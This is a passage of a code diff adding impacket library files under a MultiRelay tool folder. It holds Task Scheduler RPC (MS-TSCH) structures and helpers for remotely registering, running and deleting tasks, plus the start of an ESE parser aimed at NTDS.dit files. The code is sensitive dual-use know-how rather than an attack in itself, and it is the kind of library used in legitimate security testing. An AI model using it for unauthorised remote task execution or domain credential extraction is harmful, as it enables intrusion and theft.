+class SchRpcEnumFoldersResponse(NDRCALL):
+    structure = (
+        ('startIndex', DWORD),
+        ('pcNames', DWORD),
+        ('pNames', PTASK_NAMES_ARRAY),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.8 SchRpcEnumTasks (Opnum 7)
+class SchRpcEnumTasks(NDRCALL):
+    opnum = 7
+    structure = (
+        ('path', WSTR),
+        ('flags', DWORD),
+        ('startIndex', DWORD),
+        ('cRequested', DWORD),
+    )
+
+class SchRpcEnumTasksResponse(NDRCALL):
+    structure = (
+        ('startIndex', DWORD),
+        ('pcNames', DWORD),
+        ('pNames', PTASK_NAMES_ARRAY),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.9 SchRpcEnumInstances (Opnum 8)
+class SchRpcEnumInstances(NDRCALL):
+    opnum = 8
+    structure = (
+        ('path', LPWSTR),
+        ('flags', DWORD),
+    )
+
+class SchRpcEnumInstancesResponse(NDRCALL):
+    structure = (
+        ('pcGuids', DWORD),
+        ('pGuids', PGUID_ARRAY),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.10 SchRpcGetInstanceInfo (Opnum 9)
+class SchRpcGetInstanceInfo(NDRCALL):
+    opnum = 9
+    structure = (
+        ('guid', GUID),
+    )
+
+class SchRpcGetInstanceInfoResponse(NDRCALL):
+    structure = (
+        ('pPath', LPWSTR),
+        ('pState', DWORD),
+        ('pCurrentAction', LPWSTR),
+        ('pInfo', LPWSTR),
+        ('pcGroupInstances', DWORD),
+        ('pGroupInstances', PGUID_ARRAY),
+        ('pEnginePID', DWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.11 SchRpcStopInstance (Opnum 10)
+class SchRpcStopInstance(NDRCALL):
+    opnum = 10
+    structure = (
+        ('guid', GUID),
+        ('flags', DWORD),
+    )
+
+class SchRpcStopInstanceResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.12 SchRpcStop (Opnum 11)
+class SchRpcStop(NDRCALL):
+    opnum = 11
+    structure = (
+        ('path', LPWSTR),
+        ('flags', DWORD),
+    )
+
+class SchRpcStopResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.13 SchRpcRun (Opnum 12)
+class SchRpcRun(NDRCALL):
+    opnum = 12
+    structure = (
+        ('path', WSTR),
+        ('cArgs', DWORD),
+        ('pArgs', PWSTR_ARRAY),
+        ('flags', DWORD),
+        ('sessionId', DWORD),
+        ('user', LPWSTR),
+    )
+
+class SchRpcRunResponse(NDRCALL):
+    structure = (
+        ('pGuid', GUID),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.14 SchRpcDelete (Opnum 13)
+class SchRpcDelete(NDRCALL):
+    opnum = 13
+    structure = (
+        ('path', WSTR),
+        ('flags', DWORD),
+    )
+
+class SchRpcDeleteResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.15 SchRpcRename (Opnum 14)
+class SchRpcRename(NDRCALL):
+    opnum = 14
+    structure = (
+        ('path', WSTR),
+        ('newName', WSTR),
+        ('flags', DWORD),
+    )
+
+class SchRpcRenameResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.16 SchRpcScheduledRuntimes (Opnum 15)
+class SchRpcScheduledRuntimes(NDRCALL):
+    opnum = 15
+    structure = (
+        ('path', WSTR),
+        ('start', PSYSTEMTIME),
+        ('end', PSYSTEMTIME),
+        ('flags', DWORD),
+        ('cRequested', DWORD),
+    )
+
+class SchRpcScheduledRuntimesResponse(NDRCALL):
+    structure = (
+        ('pcRuntimes',DWORD),
+        ('pRuntimes',PSYSTEMTIME_ARRAY),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.17 SchRpcGetLastRunInfo (Opnum 16)
+class SchRpcGetLastRunInfo(NDRCALL):
+    opnum = 16
+    structure = (
+        ('path', WSTR),
+    )
+
+class SchRpcGetLastRunInfoResponse(NDRCALL):
+    structure = (
+        ('pLastRuntime',SYSTEMTIME),
+        ('pLastReturnCode',DWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.18 SchRpcGetTaskInfo (Opnum 17)
+class SchRpcGetTaskInfo(NDRCALL):
+    opnum = 17
+    structure = (
+        ('path', WSTR),
+        ('flags', DWORD),
+    )
+
+class SchRpcGetTaskInfoResponse(NDRCALL):
+    structure = (
+        ('pEnabled',DWORD),
+        ('pState',DWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.19 SchRpcGetNumberOfMissedRuns (Opnum 18)
+class SchRpcGetNumberOfMissedRuns(NDRCALL):
+    opnum = 18
+    structure = (
+        ('path', WSTR),
+    )
+
+class SchRpcGetNumberOfMissedRunsResponse(NDRCALL):
+    structure = (
+        ('pNumberOfMissedRuns',DWORD),
+        ('ErrorCode',ULONG),
+    )
+
+# 3.2.5.4.20 SchRpcEnableTask (Opnum 19)
+class SchRpcEnableTask(NDRCALL):
+    opnum = 19
+    structure = (
+        ('path', WSTR),
+        ('enabled', DWORD),
+    )
+
+class SchRpcEnableTaskResponse(NDRCALL):
+    structure = (
+        ('ErrorCode',ULONG),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+ 0 : (SchRpcHighestVersion,SchRpcHighestVersionResponse ),
+ 1 : (SchRpcRegisterTask,SchRpcRegisterTaskResponse ),
+ 2 : (SchRpcRetrieveTask,SchRpcRetrieveTaskResponse ),
+ 3 : (SchRpcCreateFolder,SchRpcCreateFolderResponse ),
+ 4 : (SchRpcSetSecurity,SchRpcSetSecurityResponse ),
+ 5 : (SchRpcGetSecurity,SchRpcGetSecurityResponse ),
+ 6 : (SchRpcEnumFolders,SchRpcEnumFoldersResponse ),
+ 7 : (SchRpcEnumTasks,SchRpcEnumTasksResponse ),
+ 8 : (SchRpcEnumInstances,SchRpcEnumInstancesResponse ),
+ 9 : (SchRpcGetInstanceInfo,SchRpcGetInstanceInfoResponse ),
+ 10 : (SchRpcStopInstance,SchRpcStopInstanceResponse ),
+ 11 : (SchRpcStop,SchRpcStopResponse ),
+ 12 : (SchRpcRun,SchRpcRunResponse ),
+ 13 : (SchRpcDelete,SchRpcDeleteResponse ),
+ 14 : (SchRpcRename,SchRpcRenameResponse ),
+ 15 : (SchRpcScheduledRuntimes,SchRpcScheduledRuntimesResponse ),
+ 16 : (SchRpcGetLastRunInfo,SchRpcGetLastRunInfoResponse ),
+ 17 : (SchRpcGetTaskInfo,SchRpcGetTaskInfoResponse ),
+ 18 : (SchRpcGetNumberOfMissedRuns,SchRpcGetNumberOfMissedRunsResponse),
+ 19 : (SchRpcEnableTask,SchRpcEnableTaskResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def checkNullString(string):
+    if string == NULL:
+        return string
+
+    if string[-1:] != '\x00':
+        return string + '\x00'
+    else:
+        return string
+
+def hSchRpcHighestVersion(dce):
+    return dce.request(SchRpcHighestVersion())
+
+def hSchRpcRegisterTask(dce, path, xml, flags, sddl, logonType, pCreds = ()):
+    request = SchRpcRegisterTask()
+    request['path'] = checkNullString(path)
+    request['xml'] = checkNullString(xml)
+    request['flags'] = flags
+    request['sddl'] = sddl
+    request['logonType'] = logonType
+    request['cCreds'] = len(pCreds)
+    if len(pCreds) == 0:
+        request['pCreds'] = NULL
+    else:
+        for cred in pCreds:
+            request['pCreds'].append(cred)
+    return dce.request(request)
+
+def hSchRpcRetrieveTask(dce, path, lpcwszLanguagesBuffer = '\x00', pulNumLanguages=0 ):
+    schRpcRetrieveTask = SchRpcRetrieveTask()
+    schRpcRetrieveTask['path'] = checkNullString(path)
+    schRpcRetrieveTask['lpcwszLanguagesBuffer'] = lpcwszLanguagesBuffer
+    schRpcRetrieveTask['pulNumLanguages'] = pulNumLanguages
+    return dce.request(schRpcRetrieveTask)
+
+def hSchRpcCreateFolder(dce, path, sddl = NULL):
+    schRpcCreateFolder = SchRpcCreateFolder()
+    schRpcCreateFolder['path'] = checkNullString(path)
+    schRpcCreateFolder['sddl'] = sddl
+    schRpcCreateFolder['flags'] = 0
+    return dce.request(schRpcCreateFolder)
+
+def hSchRpcSetSecurity(dce, path, sddl, flags):
+    schRpcSetSecurity = SchRpcSetSecurity()
+    schRpcSetSecurity['path'] = checkNullString(path)
+    schRpcSetSecurity['sddl'] = checkNullString(sddl)
+    schRpcSetSecurity['flags'] = flags
+    return dce.request(schRpcSetSecurity)
+
+def hSchRpcGetSecurity(dce, path, securityInformation=0xffffffff):
+    schRpcGetSecurity = SchRpcGetSecurity()
+    schRpcGetSecurity['path'] = checkNullString(path)
+    schRpcGetSecurity['securityInformation'] = securityInformation
+    return dce.request(schRpcGetSecurity)
+
+def hSchRpcEnumFolders(dce, path, flags=TASK_ENUM_HIDDEN, startIndex=0, cRequested=0xffffffff):
+    schRpcEnumFolders = SchRpcEnumFolders()
+    schRpcEnumFolders['path'] = checkNullString(path)
+    schRpcEnumFolders['flags'] = flags
+    schRpcEnumFolders['startIndex'] = startIndex
+    schRpcEnumFolders['cRequested'] = cRequested
+    return dce.request(schRpcEnumFolders)
+
+def hSchRpcEnumTasks(dce, path, flags=TASK_ENUM_HIDDEN, startIndex=0, cRequested=0xffffffff):
+    schRpcEnumTasks = SchRpcEnumTasks()
+    schRpcEnumTasks['path'] = checkNullString(path)
+    schRpcEnumTasks['flags'] = flags
+    schRpcEnumTasks['startIndex'] = startIndex
+    schRpcEnumTasks['cRequested'] = cRequested
+    return dce.request(schRpcEnumTasks)
+
+def hSchRpcEnumInstances(dce, path, flags=TASK_ENUM_HIDDEN):
+    schRpcEnumInstances = SchRpcEnumInstances()
+    schRpcEnumInstances['path'] = checkNullString(path)
+    schRpcEnumInstances['flags'] = flags
+    return dce.request(schRpcEnumInstances)
+
+def hSchRpcGetInstanceInfo(dce, guid):
+    schRpcGetInstanceInfo = SchRpcGetInstanceInfo()
+    schRpcGetInstanceInfo['guid'] = guid
+    return dce.request(schRpcGetInstanceInfo)
+
+def hSchRpcStopInstance(dce, guid, flags = 0):
+    schRpcStopInstance = SchRpcStopInstance()
+    schRpcStopInstance['guid'] = guid
+    schRpcStopInstance['flags'] = flags
+    return dce.request(schRpcStopInstance)
+
+def hSchRpcStop(dce, path, flags = 0):
+    schRpcStop= SchRpcStop()
+    schRpcStop['path'] = checkNullString(path)
+    schRpcStop['flags'] = flags
+    return dce.request(schRpcStop)
+
+def hSchRpcRun(dce, path, pArgs=(), flags=0, sessionId=0, user = NULL):
+    schRpcRun = SchRpcRun()
+    schRpcRun['path'] = checkNullString(path)
+    schRpcRun['cArgs'] = len(pArgs)
+    for arg in pArgs:
+        argn = LPWSTR()
+        argn['Data'] = checkNullString(arg)
+        schRpcRun['pArgs'].append(argn)
+    schRpcRun['flags'] = flags
+    schRpcRun['sessionId'] = sessionId
+    schRpcRun['user'] = user
+    return dce.request(schRpcRun)
+
+def hSchRpcDelete(dce, path, flags = 0):
+    schRpcDelete = SchRpcDelete()
+    schRpcDelete['path'] = checkNullString(path)
+    schRpcDelete['flags'] = flags
+    return dce.request(schRpcDelete)
+
+def hSchRpcRename(dce, path, newName, flags = 0):
+    schRpcRename = SchRpcRename()
+    schRpcRename['path'] = checkNullString(path)
+    schRpcRename['newName'] = checkNullString(newName)
+    schRpcRename['flags'] = flags
+    return dce.request(schRpcRename)
+
+def hSchRpcScheduledRuntimes(dce, path, start = NULL, end = NULL, flags = 0, cRequested = 10):
+    schRpcScheduledRuntimes = SchRpcScheduledRuntimes()
+    schRpcScheduledRuntimes['path'] = checkNullString(path)
+    schRpcScheduledRuntimes['start'] = start
+    schRpcScheduledRuntimes['end'] = end
+    schRpcScheduledRuntimes['flags'] = flags
+    schRpcScheduledRuntimes['cRequested'] = cRequested
+    return dce.request(schRpcScheduledRuntimes)
+
+def hSchRpcGetLastRunInfo(dce, path):
+    schRpcGetLastRunInfo = SchRpcGetLastRunInfo()
+    schRpcGetLastRunInfo['path'] = checkNullString(path)
+    return dce.request(schRpcGetLastRunInfo)
+
+def hSchRpcGetTaskInfo(dce, path, flags = 0):
+    schRpcGetTaskInfo = SchRpcGetTaskInfo()
+    schRpcGetTaskInfo['path'] = checkNullString(path)
+    schRpcGetTaskInfo['flags'] = flags
+    return dce.request(schRpcGetTaskInfo)
+
+def hSchRpcGetNumberOfMissedRuns(dce, path):
+    schRpcGetNumberOfMissedRuns = SchRpcGetNumberOfMissedRuns()
+    schRpcGetNumberOfMissedRuns['path'] = checkNullString(path)
+    return dce.request(schRpcGetNumberOfMissedRuns)
+
+def hSchRpcEnableTask(dce, path, enabled = True):
+    schRpcEnableTask = SchRpcEnableTask()
+    schRpcEnableTask['path'] = checkNullString(path)
+    if enabled is True:
+        schRpcEnableTask['enabled'] = 1
+    else:
+        schRpcEnableTask['enabled'] = 0
+    return dce.request(schRpcEnableTask)

tools/MultiRelay/impacket-dev/impacket/ese.py

@@ -0,0 +1,970 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#             Microsoft Extensive Storage Engine parser, just focused on trying 
+#             to parse NTDS.dit files (not meant as a full parser, although it might work)
+#
+# Author:
+#  Alberto Solino (@agsolino)
+#
+# Reference for:
+#  Structure.
+# 
+# Excellent reference done by Joachim Metz
+# http://forensic-proof.com/wp-content/uploads/2011/07/Extensible-Storage-Engine-ESE-Database-File-EDB-format.pdf
+#
+# ToDo: 
+# [ ] Parse multi-values properly
+# [ ] Support long values properly
+from __future__ import division
+from __future__ import print_function
+from impacket import LOG
+try:
+    from collections import OrderedDict
+except:
+    try:
+        from ordereddict.ordereddict import OrderedDict
+    except:
+        from ordereddict import OrderedDict
+from impacket.structure import Structure, hexdump
+from struct import unpack
+from binascii import hexlify
+from six import b
+
+# Constants
+
+FILE_TYPE_DATABASE       = 0
+FILE_TYPE_STREAMING_FILE = 1
+
+# Database state
+JET_dbstateJustCreated    = 1
+JET_dbstateDirtyShutdown  = 2
+JET_dbstateCleanShutdown  = 3
+JET_dbstateBeingConverted = 4
+JET_dbstateForceDetach    = 5
+
+# Page Flags
+FLAGS_ROOT         = 1
+FLAGS_LEAF         = 2
+FLAGS_PARENT       = 4
+FLAGS_EMPTY        = 8
+FLAGS_SPACE_TREE   = 0x20
+FLAGS_INDEX        = 0x40
+FLAGS_LONG_VALUE   = 0x80
+FLAGS_NEW_FORMAT   = 0x2000
+FLAGS_NEW_CHECKSUM = 0x2000
+
+# Tag Flags
+TAG_UNKNOWN = 0x1
+TAG_DEFUNCT = 0x2
+TAG_COMMON  = 0x4
+
+# Fixed Page Numbers
+DATABASE_PAGE_NUMBER           = 1
+CATALOG_PAGE_NUMBER            = 4
+CATALOG_BACKUP_PAGE_NUMBER     = 24
+
+# Fixed FatherDataPages
+DATABASE_FDP         = 1
+CATALOG_FDP          = 2
+CATALOG_BACKUP_FDP   = 3
+
+# Catalog Types
+CATALOG_TYPE_TABLE        = 1
+CATALOG_TYPE_COLUMN       = 2
+CATALOG_TYPE_INDEX        = 3
+CATALOG_TYPE_LONG_VALUE   = 4
+CATALOG_TYPE_CALLBACK     = 5
+
+# Column Types
+JET_coltypNil          = 0
+JET_coltypBit          = 1
+JET_coltypUnsignedByte = 2
+JET_coltypShort        = 3
+JET_coltypLong         = 4
+JET_coltypCurrency     = 5
+JET_coltypIEEESingle   = 6
+JET_coltypIEEEDouble   = 7
+JET_coltypDateTime     = 8
+JET_coltypBinary       = 9
+JET_coltypText         = 10
+JET_coltypLongBinary   = 11
+JET_coltypLongText     = 12
+JET_coltypSLV          = 13
+JET_coltypUnsignedLong = 14
+JET_coltypLongLong     = 15
+JET_coltypGUID         = 16
+JET_coltypUnsignedShort= 17
+JET_coltypMax          = 18
+
+ColumnTypeToName = {
+    JET_coltypNil          : 'NULL',
+    JET_coltypBit          : 'Boolean',
+    JET_coltypUnsignedByte : 'Signed byte',
+    JET_coltypShort        : 'Signed short',
+    JET_coltypLong         : 'Signed long',
+    JET_coltypCurrency     : 'Currency',
+    JET_coltypIEEESingle   : 'Single precision FP',
+    JET_coltypIEEEDouble   : 'Double precision FP',
+    JET_coltypDateTime     : 'DateTime',
+    JET_coltypBinary       : 'Binary',
+    JET_coltypText         : 'Text',
+    JET_coltypLongBinary   : 'Long Binary',
+    JET_coltypLongText     : 'Long Text',
+    JET_coltypSLV          : 'Obsolete',
+    JET_coltypUnsignedLong : 'Unsigned long',
+    JET_coltypLongLong     : 'Long long',
+    JET_coltypGUID         : 'GUID',
+    JET_coltypUnsignedShort: 'Unsigned short',
+    JET_coltypMax          : 'Max',
+}
+
+ColumnTypeSize = {
+    JET_coltypNil          : None,
+    JET_coltypBit          : (1,'B'),
+    JET_coltypUnsignedByte : (1,'B'),
+    JET_coltypShort        : (2,'<h'),
+    JET_coltypLong         : (4,'<l'),
+    JET_coltypCurrency     : (8,'<Q'),
+    JET_coltypIEEESingle   : (4,'<f'),
+    JET_coltypIEEEDouble   : (8,'<d'),
+    JET_coltypDateTime     : (8,'<Q'),
+    JET_coltypBinary       : None,
+    JET_coltypText         : None, 
+    JET_coltypLongBinary   : None,
+    JET_coltypLongText     : None,
+    JET_coltypSLV          : None,
+    JET_coltypUnsignedLong : (4,'<L'),
+    JET_coltypLongLong     : (8,'<Q'),
+    JET_coltypGUID         : (16,'16s'),
+    JET_coltypUnsignedShort: (2,'<H'),
+    JET_coltypMax          : None,
+}
+
+# Tagged Data Type Flags
+TAGGED_DATA_TYPE_VARIABLE_SIZE = 1
+TAGGED_DATA_TYPE_COMPRESSED    = 2
+TAGGED_DATA_TYPE_STORED        = 4
+TAGGED_DATA_TYPE_MULTI_VALUE   = 8
+TAGGED_DATA_TYPE_WHO_KNOWS     = 10
+
+# Code pages
+CODEPAGE_UNICODE = 1200
+CODEPAGE_ASCII   = 20127
+CODEPAGE_WESTERN = 1252
+
+StringCodePages = {
+    CODEPAGE_UNICODE : 'utf-16le', 
+    CODEPAGE_ASCII   : 'ascii',
+    CODEPAGE_WESTERN : 'cp1252',
+}
+
+# Structures
+
+TABLE_CURSOR = {
+    'TableData' : b'',
+    'FatherDataPageNumber': 0,
+    'CurrentPageData' : b'',
+    'CurrentTag' : 0,
+}
+
+class ESENT_JET_SIGNATURE(Structure):
+    structure = (
+        ('Random','<L=0'),
+        ('CreationTime','<Q=0'),
+        ('NetBiosName','16s=b""'),
+    )
+
+class ESENT_DB_HEADER(Structure):
+    structure = (
+        ('CheckSum','<L=0'),
+        ('Signature','"\xef\xcd\xab\x89'),
+        ('Version','<L=0'),
+        ('FileType','<L=0'),
+        ('DBTime','<Q=0'),
+        ('DBSignature',':',ESENT_JET_SIGNATURE),
+        ('DBState','<L=0'),
+        ('ConsistentPosition','<Q=0'),
+        ('ConsistentTime','<Q=0'),
+        ('AttachTime','<Q=0'),
+        ('AttachPosition','<Q=0'),
+        ('DetachTime','<Q=0'),
+        ('DetachPosition','<Q=0'),
+        ('LogSignature',':',ESENT_JET_SIGNATURE),
+        ('Unknown','<L=0'),
+        ('PreviousBackup','24s=b""'),
+        ('PreviousIncBackup','24s=b""'),
+        ('CurrentFullBackup','24s=b""'),
+        ('ShadowingDisables','<L=0'),
+        ('LastObjectID','<L=0'),
+        ('WindowsMajorVersion','<L=0'),
+        ('WindowsMinorVersion','<L=0'),
+        ('WindowsBuildNumber','<L=0'),
+        ('WindowsServicePackNumber','<L=0'),
+        ('FileFormatRevision','<L=0'),
+        ('PageSize','<L=0'),
+        ('RepairCount','<L=0'),
+        ('RepairTime','<Q=0'),
+        ('Unknown2','28s=b""'),
+        ('ScrubTime','<Q=0'),
+        ('RequiredLog','<Q=0'),
+        ('UpgradeExchangeFormat','<L=0'),
+        ('UpgradeFreePages','<L=0'),
+        ('UpgradeSpaceMapPages','<L=0'),
+        ('CurrentShadowBackup','24s=b""'),
+        ('CreationFileFormatVersion','<L=0'),
+        ('CreationFileFormatRevision','<L=0'),
+        ('Unknown3','16s=b""'),
+        ('OldRepairCount','<L=0'),
+        ('ECCCount','<L=0'),
+        ('LastECCTime','<Q=0'),
+        ('OldECCFixSuccessCount','<L=0'),
+        ('ECCFixErrorCount','<L=0'),
+        ('LastECCFixErrorTime','<Q=0'),
+        ('OldECCFixErrorCount','<L=0'),
+        ('BadCheckSumErrorCount','<L=0'),
+        ('LastBadCheckSumTime','<Q=0'),
+        ('OldCheckSumErrorCount','<L=0'),
+        ('CommittedLog','<L=0'),
+        ('PreviousShadowCopy','24s=b""'),
+        ('PreviousDifferentialBackup','24s=b""'),
+        ('Unknown4','40s=b""'),
+        ('NLSMajorVersion','<L=0'),
+        ('NLSMinorVersion','<L=0'),
+        ('Unknown5','148s=b""'),
+        ('UnknownFlags','<L=0'),
+    )
+
+class ESENT_PAGE_HEADER(Structure):
+    structure_2003_SP0 = (
+        ('CheckSum','<L=0'),
+        ('PageNumber','<L=0'),
+    )
+    structure_0x620_0x0b = (
+        ('CheckSum','<L=0'),
+        ('ECCCheckSum','<L=0'),
+    )
+    structure_win7 = (
+        ('CheckSum','<Q=0'),
+    )
+    common = (
+        ('LastModificationTime','<Q=0'),
+        ('PreviousPageNumber','<L=0'),
+        ('NextPageNumber','<L=0'),
+        ('FatherDataPage','<L=0'),
+        ('AvailableDataSize','<H=0'),
+        ('AvailableUncommittedDataSize','<H=0'),
+        ('FirstAvailableDataOffset','<H=0'),
+        ('FirstAvailablePageTag','<H=0'),
+        ('PageFlags','<L=0'),
+    )
+    extended_win7 = (
+        ('ExtendedCheckSum1','<Q=0'),
+        ('ExtendedCheckSum2','<Q=0'),
+        ('ExtendedCheckSum3','<Q=0'),
+        ('PageNumber','<Q=0'),
+        ('Unknown','<Q=0'),
+    )
+    def __init__(self, version, revision, pageSize=8192, data=None):
+        if (version < 0x620) or (version == 0x620 and revision < 0x0b):
+            # For sure the old format
+            self.structure = self.structure_2003_SP0 + self.common
+        elif version == 0x620 and revision < 0x11:
+            # Exchange 2003 SP1 and Windows Vista and later
+            self.structure = self.structure_0x620_0x0b + self.common
+        else:
+            # Windows 7 and later
+            self.structure = self.structure_win7 + self.common
+            if pageSize > 8192:
+                self.structure += self.extended_win7
+
+        Structure.__init__(self,data)
+
+class ESENT_ROOT_HEADER(Structure):
+    structure = (
+        ('InitialNumberOfPages','<L=0'),
+        ('ParentFatherDataPage','<L=0'),
+        ('ExtentSpace','<L=0'),
+        ('SpaceTreePageNumber','<L=0'),
+    )
+
+class ESENT_BRANCH_HEADER(Structure):
+    structure = (
+        ('CommonPageKey',':'),
+    )
+
+class ESENT_BRANCH_ENTRY(Structure):
+    common = (
+        ('CommonPageKeySize','<H=0'),
+    )
+    structure = (
+        ('LocalPageKeySize','<H=0'),
+        ('_LocalPageKey','_-LocalPageKey','self["LocalPageKeySize"]'),
+        ('LocalPageKey',':'),
+        ('ChildPageNumber','<L=0'),
+    )
+    def __init__(self, flags, data=None):
+        if flags & TAG_COMMON > 0:
+            # Include the common header
+            self.structure = self.common + self.structure
+        Structure.__init__(self,data)
+
+class ESENT_LEAF_HEADER(Structure):
+    structure = (
+        ('CommonPageKey',':'),
+    )
+
+class ESENT_LEAF_ENTRY(Structure):
+    common = (
+        ('CommonPageKeySize','<H=0'),
+    )
+    structure = (
+        ('LocalPageKeySize','<H=0'),
+        ('_LocalPageKey','_-LocalPageKey','self["LocalPageKeySize"]'),
+        ('LocalPageKey',':'),
+        ('EntryData',':'),
+    )
+    def __init__(self, flags, data=None):
+        if flags & TAG_COMMON > 0:
+            # Include the common header
+            self.structure = self.common + self.structure
+        Structure.__init__(self,data)
+
+class ESENT_SPACE_TREE_HEADER(Structure):
+    structure = (
+        ('Unknown','<Q=0'),
+    )
+
+class ESENT_SPACE_TREE_ENTRY(Structure):
+    structure = (
+        ('PageKeySize','<H=0'),
+        ('LastPageNumber','<L=0'),
+        ('NumberOfPages','<L=0'),
+    )
+
+class ESENT_INDEX_ENTRY(Structure):
+    structure = (
+        ('RecordPageKey',':'),
+    )
+
+class ESENT_DATA_DEFINITION_HEADER(Structure):
+    structure = (
+        ('LastFixedSize','<B=0'),
+        ('LastVariableDataType','<B=0'),
+        ('VariableSizeOffset','<H=0'),
+    )
+
+class ESENT_CATALOG_DATA_DEFINITION_ENTRY(Structure):
+    fixed = (
+        ('FatherDataPageID','<L=0'),
+        ('Type','<H=0'),
+        ('Identifier','<L=0'),
+    )
+
+    column_stuff = (
+        ('ColumnType','<L=0'),
+        ('SpaceUsage','<L=0'),
+        ('ColumnFlags','<L=0'),
+        ('CodePage','<L=0'),
+    )
+
+    other = (
+        ('FatherDataPageNumber','<L=0'),
+    )
+
+    table_stuff = (
+        ('SpaceUsage','<L=0'),
+#        ('TableFlags','<L=0'),
+#        ('InitialNumberOfPages','<L=0'),
+    )
+
+    index_stuff = (
+        ('SpaceUsage','<L=0'),
+        ('IndexFlags','<L=0'),
+        ('Locale','<L=0'),
+    )
+
+    lv_stuff = (
+        ('SpaceUsage','<L=0'),
+#        ('LVFlags','<L=0'),
+#        ('InitialNumberOfPages','<L=0'),
+    )
+    common = (
+#        ('RootFlag','<B=0'),
+#        ('RecordOffset','<H=0'),
+#        ('LCMapFlags','<L=0'),
+#        ('KeyMost','<H=0'),
+        ('Trailing',':'),
+    )
+
+    def __init__(self,data):
+        # Depending on the type of data we'll end up building a different struct
+        dataType = unpack('<H', data[4:][:2])[0]
+        self.structure = self.fixed
+
+        if dataType == CATALOG_TYPE_TABLE:
+            self.structure += self.other + self.table_stuff
+        elif dataType == CATALOG_TYPE_COLUMN:
+            self.structure += self.column_stuff
+        elif dataType == CATALOG_TYPE_INDEX:
+            self.structure += self.other + self.index_stuff
+        elif dataType == CATALOG_TYPE_LONG_VALUE:
+            self.structure += self.other + self.lv_stuff
+        elif dataType == CATALOG_TYPE_CALLBACK:
+            raise Exception('CallBack types not supported!')
+        else:
+            LOG.error('Unknown catalog type 0x%x' % dataType)
+            self.structure = ()
+            Structure.__init__(self,data)
+
+        self.structure += self.common
+
+        Structure.__init__(self,data)
+
+
+#def pretty_print(x):
+#    if x in '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ ':
+#       return x
+#    else:
+#       return '.'
+#
+#def hexdump(data):
+#    x=str(data)
+#    strLen = len(x)
+#    i = 0
+#    while i < strLen:
+#        print "%04x  " % i,
+#        for j in range(16):
+#            if i+j < strLen:
+#                print "%02X" % ord(x[i+j]),
+#
+#            else:
+#                print "  ",
+#            if j%16 == 7:
+#                print "",
+#        print " ",
+#        print ''.join(pretty_print(x) for x in x[i:i+16] )
+#        i += 16
+
+def getUnixTime(t):
+    t -= 116444736000000000
+    t //= 10000000
+    return t
+
+class ESENT_PAGE:
+    def __init__(self, db, data=None):
+        self.__DBHeader = db
+        self.data = data
+        self.record = None
+        if data is not None:
+            self.record = ESENT_PAGE_HEADER(self.__DBHeader['Version'], self.__DBHeader['FileFormatRevision'], self.__DBHeader['PageSize'], data)
+
+    def printFlags(self):
+        flags = self.record['PageFlags']
+        if flags & FLAGS_EMPTY:
+            print("\tEmpty")
+        if flags & FLAGS_INDEX:
+            print("\tIndex")
+        if flags & FLAGS_LEAF:
+            print("\tLeaf")
+        else:
+            print("\tBranch")
+        if flags & FLAGS_LONG_VALUE:
+            print("\tLong Value")
+        if flags & FLAGS_NEW_CHECKSUM:
+            print("\tNew Checksum")
+        if flags & FLAGS_NEW_FORMAT:
+            print("\tNew Format")
+        if flags & FLAGS_PARENT:
+            print("\tParent")
+        if flags & FLAGS_ROOT:
+            print("\tRoot")
+        if flags & FLAGS_SPACE_TREE:
+            print("\tSpace Tree")
+
+    def dump(self):
+        baseOffset = len(self.record)
+        self.record.dump()
+        tags = self.data[-4*self.record['FirstAvailablePageTag']:]
+
+        print("FLAGS: ")
+        self.printFlags()
+
+        print()
+
+        for i in range(self.record['FirstAvailablePageTag']):
+            tag = tags[-4:]
+            if self.__DBHeader['Version'] == 0x620 and self.__DBHeader['FileFormatRevision'] > 11 and self.__DBHeader['PageSize'] > 8192:
+                valueSize = unpack('<H', tag[:2])[0] & 0x7fff
+                valueOffset = unpack('<H',tag[2:])[0] & 0x7fff
+                hexdump((self.data[baseOffset+valueOffset:][:6]))
+                pageFlags = ord(self.data[baseOffset+valueOffset:][1]) >> 5
+                #print "TAG FLAG: 0x%x " % (unpack('<L', self.data[baseOffset+valueOffset:][:4]) ) >> 5
+                #print "TAG FLAG: 0x " , ord(self.data[baseOffset+valueOffset:][0])
+            else:
+                valueSize = unpack('<H', tag[:2])[0] & 0x1fff
+                pageFlags = (unpack('<H', tag[2:])[0] & 0xe000) >> 13
+                valueOffset = unpack('<H',tag[2:])[0] & 0x1fff
+                
+            print("TAG %-8d offset:0x%-6x flags:0x%-4x valueSize:0x%x" % (i,valueOffset,pageFlags,valueSize))
+            #hexdump(self.getTag(i)[1])
+            tags = tags[:-4]
+
+        if self.record['PageFlags'] & FLAGS_ROOT > 0:
+            rootHeader = ESENT_ROOT_HEADER(self.getTag(0)[1])
+            rootHeader.dump()
+        elif self.record['PageFlags'] & FLAGS_LEAF == 0:
+            # Branch Header
+            flags, data = self.getTag(0)
+            branchHeader = ESENT_BRANCH_HEADER(data)
+            branchHeader.dump()
+        else:
+            # Leaf Header
+            flags, data = self.getTag(0)
+            if self.record['PageFlags'] & FLAGS_SPACE_TREE > 0:
+                # Space Tree
+                spaceTreeHeader = ESENT_SPACE_TREE_HEADER(data)
+                spaceTreeHeader.dump()
+            else:
